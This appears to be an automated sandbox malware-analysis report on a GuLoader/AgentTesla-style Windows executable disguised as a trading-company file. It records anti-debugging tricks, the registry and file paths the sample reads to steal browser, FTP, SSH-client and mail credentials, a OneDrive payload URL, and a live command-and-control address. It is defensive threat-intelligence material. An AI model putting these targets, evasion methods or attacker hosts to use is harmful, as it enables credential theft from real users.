    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 6988Thread sleep count: 205 > 30
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 7032Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread delayed: delay time: 60000
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgBuZcfleEwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeSystem information queried: ModuleInformation

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D17601 LdrInitializeThunk,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18769 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D39 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D140DC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16245 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information:

    barindex
    GuLoader behavior detectedShow sources
    Source: Initial fileSignature Results: GuLoader behavior
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
    Tries to harvest and steal browser information (history, passwords, etc)Show sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Tries to harvest and steal ftp login credentialsShow sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
    Tries to steal Mail credentials (via file access)Show sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping2Security Software Discovery621Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion221Input Capture11Virtualization/Sandbox Evasion221Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Credentials in Registry1Remote System Discovery1SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSFile and Directory Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery34SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    KHAWATMI CO.IMPORT & EXPORT.exe13%ReversingLabsWin32.Trojan.AgentTesla

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX20%Avira URL Cloudsafe
    http://crl.microsoft0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    mbdetq.dm.files.1drv.com
    		unknown
    		unknownfalse
      		high
      onedrive.live.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2false
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/download?cid=7B0580AA0B18AEfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgKHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpfalse
            		high
            http://crl.microsoftKHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.227.139.18
            		unknownIran (ISLAMIC Republic Of)
            		48011DIGITURUNCTRfalse

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:458277
            Start date:03.08.2021
            Start time:08:05:18
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 29s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:KHAWATMI CO.IMPORT & EXPORT.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Run name:Suspected Instruction Hammering Hide Perf
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@3/2@2/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 2.2% (good quality ratio 0.2%)
            • Quality average: 1.5%
            • Quality standard deviation: 4.5%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 20.82.210.154, 23.211.4.86, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 40.126.31.135, 20.190.159.134, 40.126.31.139, 40.126.31.8, 20.190.159.132, 40.126.31.1, 40.126.31.6, 20.190.159.138, 51.11.168.232, 13.107.42.13, 13.107.42.12, 20.50.102.62
            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458277/sample/KHAWATMI CO.IMPORT & EXPORT.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            08:12:29API Interceptor1x Sleep call for process: KHAWATMI CO.IMPORT & EXPORT.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            185.227.139.18RQF00432117.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/BEF2P6YRqV1nZ
            ikenna.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/rr9an1w9Exqdo
            Purchase Order No#76480023.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/IDEUeAngcojy8
            rjHOcnLYGHZCy5f.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
            jdik4JxEILyMsaJ.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/W9ZqiawWCXST6
            BC 1.1 ASTRA JUOKU.pdf.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/yfNQXpqQZjJcw
            DHL Shipment Detailspdf.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
            1SUxqGW4Vk.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            swift.xlsxGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            EshGqi8G0p.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/o6INQXqciSF92
            RFQ file_pdf.gz.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/rVXhi7NTm83H7
            oidItpvxvp.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            Advance Payment and shedule update.xlsxGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            Documents.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/fw2pM7fnRpMCI
            d3mSX5c3S5.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            gunzipped.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/6mr5C1QFWrZ4O
            invoice.xlsxGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
            yGeKxvNPm4.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
            C1nbP5vVzw.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
            rYUbPNiimt.exeGet hashmaliciousBrowse
            • 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            DIGITURUNCTRRQF00432117.exeGet hashmaliciousBrowse
            • 185.227.139.18
            ikenna.exeGet hashmaliciousBrowse
            • 185.227.139.18
            Purchase Order No#76480023.exeGet hashmaliciousBrowse
            • 185.227.139.18
            rjHOcnLYGHZCy5f.exeGet hashmaliciousBrowse
            • 185.227.139.18
            jdik4JxEILyMsaJ.exeGet hashmaliciousBrowse
            • 185.227.139.18
            BC 1.1 ASTRA JUOKU.pdf.exeGet hashmaliciousBrowse
            • 185.227.139.18
            DHL Shipment Detailspdf.exeGet hashmaliciousBrowse
            • 185.227.139.18
            1SUxqGW4Vk.exeGet hashmaliciousBrowse
            • 185.227.139.18
            swift.xlsxGet hashmaliciousBrowse
            • 185.227.139.18
            EshGqi8G0p.exeGet hashmaliciousBrowse
            • 185.227.139.18
            RFQ file_pdf.gz.exeGet hashmaliciousBrowse
            • 185.227.139.18
            oidItpvxvp.exeGet hashmaliciousBrowse
            • 185.227.139.18
            Advance Payment and shedule update.xlsxGet hashmaliciousBrowse
            • 185.227.139.18
            Documents.exeGet hashmaliciousBrowse
            • 185.227.139.18
            d3mSX5c3S5.exeGet hashmaliciousBrowse
            • 185.227.139.18
            gunzipped.exeGet hashmaliciousBrowse
            • 185.227.139.18
            invoice.xlsxGet hashmaliciousBrowse
            • 185.227.139.18
            yGeKxvNPm4.exeGet hashmaliciousBrowse
            • 185.227.139.18
            C1nbP5vVzw.exeGet hashmaliciousBrowse
            • 185.227.139.18
            rYUbPNiimt.exeGet hashmaliciousBrowse
            • 185.227.139.18

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
            Process:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
            Process:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            File Type:data
            Category:dropped
            Size (bytes):598
            Entropy (8bit):0.6390116820665388
            Encrypted:false
            SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbON:+
            MD5:E306B2B657314B7CA1B899F1A8B2A979
            SHA1:DDF029D39D1A076A4218049CBD5143EE64A0D13B
            SHA-256:A3284A821DC0F8281285B68E3F1F2712F6D5B97E605233AC91235F780D55DCE4
            SHA-512:EF935FBEDB6A39D819F650912E4E72355A6B395B01D15DE89CB30045A7330936CC1964C3CA771F8A9327043D734D5CD252DD91DE858A28E97283E310A988E41B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.387725511048366
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:KHAWATMI CO.IMPORT & EXPORT.exe
            File size:147456
            MD5:0153ae8cf4b1f546721332b5cb3f973c
            SHA1:479858ef740172cb3791527a9c9d0da76eec3af4
            SHA256:97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
            SHA512:1a6ae92b4937ea140069189487e669377f8a59ceffa29597f18c94d83646184344f4ba4d0fe42ce5153d95791ad31b3fe8b715b6a55fe3b923ce59fd4201bac1
            SSDEEP:1536:EtVr5LC183SqwDIse4yckz/50ZG8tnSSyeMn5iXDjTf8+Oh1K:E/5CIRwDdeZcFYeMn5iXDj5Oh1K
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...#..V.....................0............... ....@................

            File Icon

            Icon Hash:c4e8c8cccce0e8e8

            Static PE Info

            General

            Entrypoint:0x4014b4
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x56A2ED23 [Sat Jan 23 03:01:55 2016 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:fef384fc3a66a559dff455f07d497ca0

            Entrypoint Preview

            Instruction
            push 00401EBCh
            call 00007F0E0C9517B3h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            inc eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ebp+39C0B02Ah], al
            xor dword ptr [eax-2DAA55BCh], 16h
            adc byte ptr [bx+si-62h], dh
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            inc ecx
            add byte ptr [eax], ah
            or byte ptr [ecx+00h], al
            inc esp
            inc ebp
            dec ebp
            dec ecx
            dec esi
            inc ebp
            push edx
            inc ecx
            dec esp
            dec ecx
            push ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add bh, bh
            int3
            xor dword ptr [eax], eax
            add byte ptr [eax+72h], al
            js 00007F0E0C951825h
            call far 0055h : 914061FDh
            jl 00007F0E0C95180Bh
            inc esp
            inc esp
            inc eax
            daa
            adc ch, bh
            jbe 00007F0E0C951760h
            shr byte ptr [edi-7B6F79B1h], FFFFFFFBh
            enter 9718h, 57h
            cmp cl, byte ptr [edi-53h]
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            sbb al, 09h
            add byte ptr [eax], al
            pop ss
            or dword ptr [eax], eax
            add byte ptr [eax], al
            or al, byte ptr [eax]
            push 00000075h
            js 00007F0E0C951836h
            popad
            jo 00007F0E0C951831h
            jnc 00007F0E0C95182Bh
            je 00007F0E0C9517C2h
            or eax, 46000B01h
            outsd
            jc 00007F0E0C951827h

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x20b140x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000xbfc.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2010c0x21000False0.378292199337data6.67763542403IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x220000x11bc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x240000xbfc0x1000False0.310791015625data3.24011988097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x243540x8a8data
            RT_GROUP_ICON0x243400x14data
            RT_VERSION0x240f00x250dataChineseTaiwan

            Imports

            DLLImport
            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaR4Str, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaR8Str, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

            Version Infos

            DescriptionData
            Translation0x0404 0x04b0
            InternalNameTolip
            FileVersion1.00
            CompanyNameIntersection Road
            CommentsIntersection Road
            ProductNameGender7
            ProductVersion1.00
            OriginalFilenameTolip.exe

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            ChineseTaiwan

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 3, 2021 08:12:26.496088028 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:26.639414072 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:26.639549971 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:26.643964052 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:26.786485910 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:26.786619902 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:26.930691957 CEST8049753185.227.139.18192.168.2.3
